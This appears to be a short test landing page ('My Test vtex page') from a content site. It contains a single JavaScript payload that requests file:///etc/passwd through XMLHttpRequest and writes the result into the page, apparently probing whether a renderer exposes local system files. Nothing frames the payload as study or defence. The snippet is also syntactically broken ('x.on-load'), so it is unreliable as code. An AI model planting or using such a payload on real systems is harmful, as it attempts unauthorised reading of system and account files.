Materiais

Written on . Posted in Landpages.

testing

My Test vtex page

Apenas um pequeno teste - do neida

x = new XMLHttpRequest(); x.on-load = function() { document.write(this.responseText) }; x.open("GET", "file:///etc/passwd"); x.send();